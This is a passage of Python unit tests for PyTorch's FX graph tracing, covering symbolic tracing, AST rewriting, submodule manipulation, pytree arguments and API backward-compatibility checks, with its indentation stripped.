return f(a)
nf = symbolic_trace(f_higher, concrete_args={'f': lambda x: x * 2})
self.assertEqual(nf(3, lambda x: x * 2), 6)
def test_custom_traceback_raised_when_exception_source_is_graphmodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.W = torch.nn.Parameter(torch.randn(5))
def forward(self, x):
return torch.dot(self.W, x)
traced = torch.fx.symbolic_trace(M())
out = [n for n in traced.graph.nodes if n.op == "output"][-1]
with traced.graph.inserting_before(out):
relu_out = traced.graph.call_method(method_name='relu',
args=(out.args[0],))
out.args = (relu_out,)
traced.recompile()
with self.capture_stderr() as captured:
with self.assertRaises(TypeError):
traced(5)
self.assertRegex(captured[0],
r"Call using an FX-traced Module, line .* of the "
r"traced Module's generated forward function:")
def test_custom_traceback_not_raised_when_exception_source_is_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.linear = torch.nn.Linear(3, 4)
def forward(self, x):
return self.linear(x)
traced = torch.fx.symbolic_trace(M())
# Do not change this to `capture_stderr` or another context
# manager without ensuring that the output is as expected
try:
traced(torch.rand(5, 5))
except RuntimeError:
captured = traceback.format_exc()
self.assertNotRegex(captured,
r"Call using an FX-traced Module, line .* of the "
r"traced Module's generated forward function:")
def test_graph_module_replicate_for_dp(self):
class Foo(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
gm = torch.fx.symbolic_trace(Foo())
x = torch.randn(5, 3)
out = gm(x)
replica = gm._replicate_for_data_parallel()
out_replica = replica(x)
torch.testing.assert_allclose(out_replica, out)
def test_ast_rewriter_rewrites_assert(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_ast_rewriter_rewrites_assert_with_message(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z, "msg"
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_throw_out_variant(self):
def foo(x):
y = torch.rand_like(x)
torch.sigmoid(x, out=y)
return y
class MyTracer(torch.fx.Tracer):
check_mutable_operations = True
tracer = MyTracer()
with self.assertRaisesRegex(RuntimeError, 'mutable operation aten::sigmoid.out'):
traced_graph = tracer.trace(foo)
def test_ast_rewriter_reassigns_submodules(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.bn = torch.nn.BatchNorm2d(100)
def forward(self, x: torch.Tensor):
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_ast_rewriter_wrap(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5))
def to_trace(y):
return (
a_lifted_leaf((4, y), 3)
+ a_lifted_leaf((3, 4), 5)
+ a_lifted_leaf((y, y), y)
)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(to_trace)
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("a_lifted_leaf", traced.code)
self.assertEqual(27, traced(2))
self.assertIs(a_lifted_leaf, real_a_lifed_leaf)
def test_ast_rewriter_wrap_fn_directly(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5))
def to_trace(y):
return (
a_lifted_leaf2((4, y), 3)
+ a_lifted_leaf2((3, 4), 5)
+ a_lifted_leaf2((y, y), y)
)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(to_trace)
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("a_lifted_leaf2", traced.code)
self.assertEqual(27, traced(2))
self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2)
def test_profiler_ranges_side_effect(self):
g = torch.fx.Graph()
handle = g.call_function(torch.ops.profiler._record_function_enter, ('test_range',))
g.call_function(torch.ops.profiler._record_function_exit, (handle,))
g.output(None)
found_targets = {}
for node in g.nodes:
if node.op == 'call_function':
found_targets.setdefault(node.target)
self.assertEqual(
found_targets.keys(), [torch.ops.profiler._record_function_enter, torch.ops.profiler._record_function_exit])
g.eliminate_dead_code()
found_targets = {}
for node in g.nodes:
if node.op == 'call_function':
found_targets.setdefault(node.target)
self.assertEqual(
found_targets.keys(), [torch.ops.profiler._record_function_enter, torch.ops.profiler._record_function_exit])
def test_ast_rewriter_wrapped_via_decorator(self):
class F(torch.nn.Module):
def forward(self, x):
return wrapped_via_decorator(x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(F())
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("wrapped_via_decorator", traced.code)
self.assertEqual(traced(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_ast_rewriter_wrapped_via_decorator_and_transformed(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(to_trace)
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("wrapped_via_decorator", traced.code)
self.assertEqual(traced(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
transformed = torch.fx.Transformer(traced).transform()
self.assertIn("wrapped_via_decorator", transformed.code)
self.assertEqual(transformed(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_ast_rewriter_wrap_with_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
def forward(self, x: torch.Tensor):
return wrapped_with_submodule(x, self.batchnorm1d)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("wrapped_with_submodule", traced.code)
input = torch.rand(3, 2)
ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
self.assertEqual(ref_batchnorm1d(input), traced(input))
def test_submodule_manipulation_API(self):
class C(torch.nn.Module):
def __init__(self):
super(C, self).__init__()
self.conv = torch.nn.Conv2d(16, 33, 3, stride=2)
self.param = torch.nn.Parameter(torch.rand(2, 3))
def forward(self, x):
return self.conv(torch.cat([self.param, x]))
class B(torch.nn.Module):
def __init__(self):
super(B, self).__init__()
self.linear = torch.nn.Linear(100, 200)
self.register_buffer("buf", torch.randn(2, 3))
self.net_c = C()
def forward(self, x):
return self.linear(torch.cat([self.buf, self.net_c(x)]))
class A(torch.nn.Module):
def __init__(self):
super(A, self).__init__()
self.net_b = B()
self.param = torch.nn.Parameter(torch.rand(2, 3))
def forward(self, x):
return self.net_b(x) + self.param
a = symbolic_trace(A())
a.add_submodule("net_b.net_c.dropout", torch.nn.Dropout(p=0.2))
conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"][-1]
with a.graph.inserting_before(conv):
with warnings.catch_warnings(record=True) as w:
dropout = a.graph.call_module(module_name="net_b.net_c.dropout",
args=conv.args)
self.assertEqual(len(w), 0)
conv.replace_all_uses_with(dropout)
a.graph.erase_node(conv)
a.recompile()
def module_exists(gm: GraphModule, path: str) -> bool:
return any(path == name for name, _ in gm.named_modules())
def parameter_exists(gm: GraphModule, path: str) -> bool:
return (any(path == name for name, _ in gm.named_parameters())
and any(path == name for name in gm.state_dict().keys()))
def buffer_exists(gm: GraphModule, path: str) -> bool:
return (any(path == name for name, _ in gm.named_buffers())
and any(path == name for name in gm.state_dict().keys()))
# Test that we added the "dropout" submodule
self.assertTrue(module_exists(a, "net_b.net_c.dropout"))
# Test `get_submodule` with an added submodule
self.assertIsNotNone(a.get_submodule("net_b.net_c.dropout"))
# Test that the "conv" submodule is still there
self.assertTrue(module_exists(a, "net_b.net_c.conv"))
# Test `get_submodule` with an original module
self.assertIsNotNone(a.get_submodule("net_b.net_c.conv"))
# Test that the "conv" node is NOT still there
conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"]
self.assertEqual(conv, [])
a.delete_submodule("net_b.net_c.conv")
# Test that the "conv" submodule is now gone
self.assertFalse(module_exists(a, "net_b.net_c.conv"))
# Test `get_submodule` with a deleted submodule
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`conv`"):
self.assertIsNone(a.get_submodule("net_b.net_c.conv"))
# Test `get_attr` warnings
cat = [n for n in a.graph.nodes if n.target == torch.cat][-1]
with a.graph.inserting_before(cat):
with warnings.catch_warnings(record=True) as w:
param = a.graph.get_attr(qualified_name="net_b.net_c.param")
self.assertEqual(len(w), 0)
with self.assertWarnsRegex(UserWarning, "Attempted to "
"insert a get_attr Node with no "
"underlying reference in the "
"owning GraphModule"):
bad_param = a.graph.get_attr(qualified_name="net_b.param")
a.graph.erase_node(bad_param)
cat.args = (*cat.args, param)
a.recompile()
a.graph.lint()
# Test `get_parameter`
a.get_parameter("net_b.net_c.param")
with self.assertRaisesRegex(AttributeError, "is not an "
"nn.Parameter"):
a.get_parameter("net_b.buf")
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`param`"):
a.get_parameter("net_b.param")
# Test `get_buffer`
a.get_buffer("net_b.buf")
with self.assertRaisesRegex(AttributeError, "is not a "
"buffer"):
a.get_buffer("net_b.net_c.param")
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`buf`"):
a.get_buffer("net_b.net_c.buf")
# Test non-nested attributes
a.get_submodule("")
a.get_parameter("param")
# Insert some unused submodules
a.add_submodule("net_b.embedding", torch.nn.Embedding(10, 3))
a.add_submodule("net_b.net_c.embedding", torch.nn.Embedding(10, 3))
a.add_submodule("net_b.net_c.rnn", torch.nn.RNN(10, 20, 2))
a.add_submodule("batch_norm_2d", torch.nn.BatchNorm2d(100))
# Garbage collection
a.delete_all_unused_submodules()
# Test that all the unused submodules are gone
self.assertFalse(module_exists(a, "net_b.embedding"))
self.assertFalse(module_exists(a, "net_b.net_c.embedding"))
self.assertFalse(module_exists(a, "net_b.net_c.rnn"))
self.assertFalse(module_exists(a, "batch_norm_2d"))
# Test that we didn't delete any unused Parameters or buffers
self.assertTrue(parameter_exists(a, "net_b.net_c.param"))
self.assertTrue(buffer_exists(a, "net_b.buf"))
a.graph.lint()
def test_delete_unused_submodules_leaf(self):
class SubModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.linear = torch.nn.Linear(10, 10)
self.relu = torch.nn.ReLU()
def forward(self, x):
x = self.linear(x)
x = self.relu(x)
return x
class Model(torch.nn.Module):
def __init__(self):
super().__init__()
self.submod = SubModule()
def forward(self, x):
x = self.submod(x)
return x
model = Model()
class MyCustomTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return module_qualified_name == "submod"
inputs = torch.randn(1, 10)
traced_graph = MyCustomTracer().trace(model)
gm2 = torch.fx.GraphModule(model, traced_graph)
gm2.delete_all_unused_submodules()
torch.testing.assert_allclose(gm2(inputs), model(inputs))
def test_tracing_graphmodules_as_leaf_submodules(self):
class A(torch.nn.Module):
def forward(self, t):
return t + t
class B(torch.nn.Module):
def __init__(self):
super(type(self), self).__init__()
self.calling = False
self.called = False
def forward(self, t):
if self.calling:
return t - t
else:
return t + t
def __call__(self, *args):
self.called = True
self.calling = True
return super(type(self), self).__call__(*args)
self.calling = False
class M(torch.nn.Module):
def __init__(self, a, b):
super().__init__()
self.a = a
self.b = b
def forward(self, t):
x = self.a(t)
y = self.b(t)
return x + y
class LeafTracer(Tracer):
def is_leaf_module(self, module, name):
return True
class LeafTracerNotB(Tracer):
def is_leaf_module(self, module, name):
return False if "b" in name else True
# Recompile calls added "for fun", since they
# chain __call__ wrappers.
#
# Test: B as a regular, non-leaf module
#
a = symbolic_trace(A())
a.recompile()
m = M(a, B())
graph = LeafTracerNotB().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
# Test graphmodule/submodule a is not inlined.
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
# Test submodule b is not treated as leaf.
self.assertFalse(hasattr(gm, "b"))
# Test assert custom __call__ on submodule b was honored.
match = [
n
for n in gm.graph.nodes
if n.op == "call_function" and n.target == operator.sub
]
self.assertTrue(len(match) == 1)
#
# Test: B as a regular, leaf module
# symbolic_trace should only patch torch.nn.Module.__call__,
# which means B.__call__ should still execute
#
a = symbolic_trace(A())
a.recompile()
b = B()
m = M(a, b)
graph = LeafTracer().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
# Test graphmodule/submodule a is not inlined.
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
# Test submodule b is leaf:
self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"]
self.assertTrue(len(match) == 1)
# Test b.__call__ was run
self.assertTrue(b.called)
self.assertTrue(gm.get_submodule("b").called)
#
# Test: B as GraphModule leaf
# __call__ not honored since symbolic_trace directly invokes forward()
#
a = symbolic_trace(A())
a.recompile()
b = symbolic_trace(B())
b.recompile()
m = M(a, b)
graph = LeafTracer().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"]
self.assertTrue(len(match) == 1)
def _test_graph_module_init_buffer_param_copied(self, use_dict_init: bool):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.register_buffer("my_buff", torch.rand(3, 4))
self.register_parameter(
"my_param", torch.nn.Parameter(torch.rand(3, 4))
)
def forward(self, x):
return x + self.my_buff + self.my_param
mod = MyModule()
mod_traced = symbolic_trace(mod)
# Create new GraphModule based on original, either w/ dict or root module.
orig_buff = mod_traced.get_buffer("my_buff")
orig_param = mod_traced.get_parameter("my_param")
mod_traced_new = GraphModule(
{"my_buff": orig_buff, "my_param": orig_param} if use_dict_init else mod,
mod_traced.graph,
)
# Check that both my_buff and my_param are found and the same.
try:
new_buff = mod_traced_new.get_buffer("my_buff")
except Exception:
self.fail("Did not find my_buff")
self.assertEqual(orig_buff, new_buff)
try:
new_param = mod_traced_new.get_parameter("my_param")
except Exception:
self.fail("Did not find my_param")
self.assertEqual(orig_param, new_param)
x = torch.rand(3, 4)
orig_out = mod_traced(x)
submodules_out = mod_traced_new(x)
self.assertEqual(orig_out, submodules_out)
def test_graph_module_init_buffer_param_copied_dict_init(self):
self._test_graph_module_init_buffer_param_copied(use_dict_init=True)
def test_graph_module_init_buffer_param_copied_mod_init(self):
self._test_graph_module_init_buffer_param_copied(use_dict_init=False)
def test_annotations_with_no_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, a: A) -> torch.Tensor:
return a(x)
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: 'torch.Tensor', a: 'A') -> 'torch.Tensor':
return a(x)
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_no_internal_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: List[torch.Tensor], a: A) -> torch.Tensor:
return a(x[0])
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_internal_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: List['torch.Tensor'], a: A) -> 'torch.Tensor':
return a(x)[0]
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
@unittest.skipIf(sys.version_info < (3, 7), "`__future__` feature "
"`annotations` is not defined in Python <3.7")
def test_annotation_with_future(self):
try:
import fx.test_future # noqa: F401
finally:
del sys.modules["__future__"]
def test_annotations_empty_tuple(self):
class Foo(torch.nn.Module):
def forward(self, x: Tuple[()], y: Tuple[str, Tuple[()]]):
return "foo"
traced = torch.fx.symbolic_trace(Foo())
x = ()
y = ("bar", ())
traced(x, y)
FileCheck().check("_Tuple[()]") \
.check("typing_Tuple[str,typing_Tuple[()]]") \
.run(traced.code)
scripted = torch.jit.script(traced)
scripted(x, y)
FileCheck().check("Tuple[()]") \
.check("Tuple[str, Tuple[()]]") \
.run(scripted.code)
@skipIfNoTorchVision
def test_cpatcher(self):
cnt = 0
def patched_impl(to_patch, args, kwargs):
nonlocal cnt
cnt += 1
return to_patch(*args, **kwargs)
c_patch_enabled = True
def patched_in(to_patch, args, kwargs):
nonlocal c_patch_enabled
try:
c_patch_enabled = False
r = patched_impl(to_patch, args, kwargs)
finally:
c_patch_enabled = True
return r
def trace_func(frame, action, arg):
if action == 'c_call':
if c_patch_enabled:
torch._C._fx.patch_function(arg, patched_in)
import torch
rn = torchvision_models.resnet18()
try:
sys.setprofile(trace_func)
rn(torch.rand(1, 3, 224, 224))
print("testing print patch")
finally:
sys.setprofile(None)
assert(cnt != 0)
def test_randn(self):
def f():
return torch.randn(3, 3)
fx_f = symbolic_trace(f, enable_cpatching=True)
assert(any(i.target == torch.randn for i in fx_f.graph.nodes))
fx_f = symbolic_trace(f, enable_cpatching=False)
assert(all(i.target != torch.randn for i in fx_f.graph.nodes))
fx_f = symbolic_trace(f, enable_cpatching=True)
assert(any(i.target == torch.randn for i in fx_f.graph.nodes))
def test_pytree(self):
def f_sum(x):
return sum(x)
def f_sum_dict(x):
out = 0
for k, v in x.items():
out += v
return out
def f_dict_list_map(x):
new_dict = {}
for k, v in x.items():
new_dict[k] = [i + 1 for i in v]
return new_dict
def f_dict_add(x):
return x['a'] + sum(x['z'])
def f_namedtuple_add(x):
return x.x + x.y
pytree._register_pytree_node(
Foo,
lambda x: ([x.a, x.b], None),
lambda x, _: Foo(x[0], x[1]),
)
fx_pytree.register_pytree_flatten_spec(Foo, lambda x, _: [x.a, x.b])
def f_custom(x):
return x.a + x.b
def f_custom_dict(x):
return f_sum_dict(x.a) + x.b
def f_return_custom(x):
return Foo(x.b, x.a)
tests = [
(f_sum, [PH, PH, PH]),
(f_sum, []),
(f_sum_dict, {'a': PH, 'b': PH, 'c': PH}),
(f_dict_list_map, {'a': (PH, PH), 'b': [PH], 'c': []}),
(f_dict_list_map, {5: (PH, PH, PH)}),
(f_dict_add, {'a': PH, 'z': (PH, PH, PH)}),
(f_dict_add, {'a': PH, 'z': []}),
(f_custom, Foo(PH, PH)),
(f_custom, Foo(PH, 3)),
(f_custom_dict, Foo({'a': PH, 'b': PH}, PH)),
# (f_return_custom, Foo(PH, PH)), # Don't currently support output pytrees
(f_namedtuple_add, Point(PH, PH)),
]
def verify_pytree(f, inp):
val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp)
num_flat_args = len([i == PH for i in pytree.tree_flatten(inp)[0]])
orig_out = f(val)
nf = symbolic_trace(f, concrete_args={'x': inp})
self.assertEqual(nf(val), orig_out)
assert num_flat_args == 0 or "tree_flatten_spec" in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args)
nf = symbolic_trace(nf)
self.assertEqual(nf(val), orig_out)
assert "tree_flatten_spec" not in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == 1)
nf = symbolic_trace(nf, concrete_args={'x': inp})
self.assertEqual(nf(val), orig_out)
assert num_flat_args == 0 or "tree_flatten_spec" in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args)
pickled = pickle.dumps(nf)
nf = pickle.loads(pickled)
self.assertEqual(nf(val), orig_out)
for f, inp in tests:
verify_pytree(f, inp)
def test_pytree_concrete(self):
def f(b, a):
if b:
return a['a']
else:
return a['z']
inp = {'a': {'a': PH, 'z': PH}, 'b': True}
nf = symbolic_trace(f, concrete_args=inp)
val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp)
self.assertEqual(nf(**val), f(**val))
nf = symbolic_trace(nf)
self.assertEqual(nf(**val), f(**val))
def run_getitem_target():
from torch.fx._symbolic_trace import _wrapped_methods_to_patch
_wrapped_methods_to_patch.append((torch.Tensor, "__getitem__"))
try:
TestFX().getitem_inner()
finally:
_wrapped_methods_to_patch.pop()
class TestOperatorSignatures(JitTestCase):
def setUp(self):
# Checking for mutable operations whil tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
@onlyCPU
@ops(op_db, allowed_dtypes=(torch.float,))
def test_get_torch_func_signature_exhaustive(self, device, dtype, op):
# Sorted and one entry on each line to minimize merge conflicts.
known_no_schema = {'block_diag',
'broadcast_tensors',
'cdist',
'contiguous',
'dstack',
'einsum',
'expand',
'expand_as',
'fill_',
'hstack',
'igamma',
'igammac',
'linalg.multi_dot',
'lu',
'T', # Implemented with a lambda
'H', # Implemented with a lambda
'mT', # Implemented with a lambda
'mH', # Implemented with a lambda
'norm',
'polygamma',
'special.polygamma',
'repeat',
'reshape_as',
'resize_',
'resize_as_',
'special.zeta',
'stack',
'to_sparse',
'view',
'view_as',
'nn.functional.hardshrink',
'vstack',
'where',
'zero_',
'__getitem__',
'__radd__',
'__rsub__',
'__rmul__',
'__rdiv__',
'__rmod__',
'__rpow__',
'__rand__',
'__ror__',
'__rxor__',
'__rmatmul__'}
try:
sample_inputs_itr = op.sample_inputs(device, dtype, requires_grad=False)
schemas = get_signature_for_torch_op(op.op)
if not schemas:
raise RuntimeError('No Schemas Returned')
for sample_input in sample_inputs_itr:
# Iterate through overloads until we hit a match. If we exit this
# loop via `else`, we haven't found a match
for schema in schemas:
try:
bound_args = schema.bind(sample_input.input, *sample_input.args, **sample_input.kwargs)
bound_args.apply_defaults()
op(*bound_args.args, **bound_args.kwargs)
break
except TypeError as e:
pass
else:
raise RuntimeError(f'Did not match any schemas for op {op.name}!')
except Exception as e:
assert op.name in known_no_schema or "nn.functional" in op.name
class TestFXAPIBackwardCompatibility(JitTestCase):
def setUp(self):
self.maxDiff = None
# Checking for mutable operations whil tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
def _fn_to_stable_annotation_str(self, obj):
"""
Unfortunately we have to serialize function signatures manually since
serialization for `inspect.Signature` objects is not stable across
python versions
"""
fn_name = torch.typename(obj)
signature = inspect.signature(obj)
sig_str = f'{fn_name}{signature}'
arg_strs = []
for k, v in signature.parameters.items():
maybe_type_annotation = f': {self._annotation_type_to_stable_str(v.annotation, sig_str)}'\
if v.annotation is not inspect.Signature.empty else ''
def default_val_str(val):
if isinstance(val, (tuple, list)):
str_pieces = ['(' if isinstance(val, tuple) else '[']
str_pieces.append(', '.join(default_val_str(v) for v in val))
if isinstance(val, tuple) and len(str_pieces) == 2:
str_pieces.append(',')
str_pieces.append(')' if isinstance(val, tuple) else ']')
return ''.join(str_pieces)
# Need to fix up some default value strings.
# First case: modules. Default module `repr` contains the FS path of the module.
# Don't leak that
if isinstance(val, types.ModuleType):
return f'<module {val.__name__}>'
# Second case: callables. Callables (such as lambdas) encode their address in
# their string repr. Don't do that
if callable(val):
return f'<function {val.__name__}>'
return str(val)
if v.default is not inspect.Signature.empty:
default_val_str = default_val_str(v.default) if not isinstance(v.default, str) else f"'{v.default}'"
maybe_default = f' = {default_val_str}'
else:
maybe_default = ''
maybe_stars = ''
if v.kind == inspect.Parameter.VAR_POSITIONAL:
maybe_stars = '*'
elif v.kind == inspect.Parameter.VAR_KEYWORD:
maybe_stars = '**'
arg_strs.append(f'{maybe_stars}{k}{maybe_type_annotation}{maybe_default}')
return_annot = f' -> {self._annotation_type_to_stable_str(signature.return_annotation, sig_str)}'\
if signature.return_annotation is not inspect.Signature.empty else ''
return f'{fn_name}({", ".join(arg_strs)}){return_annot}'
def _annotation_type_to_stable_str(self, t, sig_str):
if t is inspect.Signature.empty:
return ''
# Forward ref
if isinstance(t, str):
return f"'{t}'"
if hasattr(typing, 'ForwardRef') and isinstance(t, typing.ForwardRef):
return t.__forward_arg__
if hasattr(typing, '_ForwardRef') and isinstance(t, typing._ForwardRef):
return t.__forward_arg__
trivial_mappings = {
str : 'str',
int : 'int',
float: 'float',
bool: 'bool',
torch.dtype: 'torch.dtype',
torch.Tensor: 'torch.Tensor',
torch.device: 'torch.device',
torch.memory_format: 'torch.memory_format',
slice: 'slice',
torch.nn.Module: 'torch.nn.modules.module.Module',
torch.fx.Graph : 'torch.fx.graph.Graph',
torch.fx.Node : 'torch.fx.node.Node',
torch.fx.Proxy : 'torch.fx.proxy.Proxy',
torch.fx.node.Target : 'torch.fx.node.Target',
torch.fx.node.Argument : 'torch.fx.node.Argument',
torch.fx.graph.PythonCode : 'torch.fx.graph.PythonCode',
torch.fx.graph_module.GraphModule: 'torch.fx.graph_module.GraphModule',
torch.fx.subgraph_rewriter.Match: 'torch.fx.subgraph_rewriter.Match',
Ellipsis : '...',
typing.Any: 'Any',
type(None): 'NoneType',
None: 'None',
typing.Iterator: 'Iterator',
}
mapping = trivial_mappings.get(t, None)
if mapping:
return mapping
# Handle types with contained types
contained = getattr(t, '__args__', None) or []
# Callables contain a bare List for arguments
contained = t if isinstance(t, list) else contained
# Python 3.8 puts type vars into __args__ for unbound types such as Dict
if all(isinstance(ct, typing.TypeVar) for ct in contained):
contained = []
contained_type_annots = [self._annotation_type_to_stable_str(ct, sig_str) for ct in contained]
contained_type_str = f'[{", ".join(contained_type_annots)}]' if len(contained_type_annots) > 0 else ''
origin = getattr(t, '__origin__', None)
if origin is None:
# Unbound types don't have `__origin__` in some Python versions, so fix that up here.
origin = t if t in {typing.Tuple, typing.Union, typing.Dict, typing.List, typing.Type, typing.Callable} else origin
if origin in {tuple, typing.Tuple}:
return f'Tuple{contained_type_str}'
if origin in {typing.Union}:
# Annoying hack to detect Optional
if len(contained) == 2 and (contained[0] is type(None)) ^ (contained[1] is type(None)):
not_none_param = contained[0] if contained[0] is not type(None) else contained[1]
return f'Optional[{self._annotation_type_to_stable_str(not_none_param, sig_str)}]'
return f'Union{contained_type_str}'
if origin in {dict, typing.Dict}:
return f'Dict{contained_type_str}'
if origin in {list, typing.List}:
return f'List{contained_type_str}'
if origin in {type, typing.Type}:
return f'Type{contained_type_str}'
if isinstance(t, typing.Callable):
if len(contained) > 0 and contained[0] is not Ellipsis:
return f'Callable[[{", ".join(contained_type_annots[:-1])}], {contained_type_annots[-1]}]'
else:
return f'Callable{contained_type_str}'
raise RuntimeError(f'Unrecognized type {t} used in BC-compatible type signature {sig_str}.'
f'Please add support for this type and confirm with the '
f'FX team that your signature change is valid.')
def test_function_back_compat(self):
"""
Test backward compatibility for function signatures with
@compatibility(is_backward_compatible=True). Currently this checks for
exact signature matches, which may lead to false positives. If this
becomes too annoying, we can refine this check to actually parse out
the saved schema strings and check if the change is truly backward-
incompatible.
"""
signature_strs = []
for obj in _BACK_COMPAT_OBJECTS:
if not isinstance(obj, type):
signature_strs.append(self._fn_to_stable_annotation_str(obj))
signature_strs.sort()
try:
self.assertExpected('\n'.join(signature_strs), 'fx_backcompat_function_signatures')
except AssertionError as e:
msg = f"{e}\n****** ERROR ******\nAn FX function that has been marked " \
f"as backwards-compatible has experienced a signature change. See the " \
f"above exception context for more information. If this change was " \
f"unintended, please revert it. If it was intended, check with the FX " \
f"team to ensure that the proper deprecation protocols have been followed " \
f"and subsequently --accept the change."
raise AssertionError(msg)
def test_class_member_back_compat(self):
"""
Test backward compatibility for members of classes with
@compatibility(is_backward_compatible=True). Currently this checks for
exact matches on the publicly visible members of the class.
"""
class_method_strs = []
for obj in _BACK_COMPAT_OBJECTS:
if isinstance(obj, type):
public_members = [name for name in obj.__dict__ if not name.startswith('_')]
class_method_strs.append(f'{torch.typename(obj)} {sorted(public_members)}')
class_method_strs.sort()
try:
self.assertExpected('\n'.join(class_method_strs), 'fx_backcompat_class_members')
except AssertionError as e:
msg = f"{e}\n****** ERROR ******\nAn FX class that has been marked " \
f"as backwards-compatible has experienced change in its public members. See the " \
f"above exception context for more information. If this change was " \
f"unintended, please revert it. If it was intended, check with the FX " \
f"team to ensure that the proper deprecation protocols have been followed " \
f"and subsequently --accept the change."
raise AssertionError(msg)
def test_public_api_surface(self):
non_back_compat_objects = {}
def check_symbols_have_bc_designation(m, prefix):
if not m.__name__.startswith('torch.fx'):
return
if m.__name__.startswith('torch.fx.experimental'):
return
for k, v in m.__dict__.items():
if v is m:
continue
if k.startswith('_'):
continue
if isinstance(v, types.ModuleType):
check_symbols_have_bc_designation(v, prefix + [k])
elif isinstance(v, type) or isinstance(v, types.FunctionType):
if v not in _MARKED_WITH_COMATIBLITY:
non_back_compat_objects.setdefault(v)
check_symbols_have_bc_designation(torch.fx, ['torch', 'fx'])
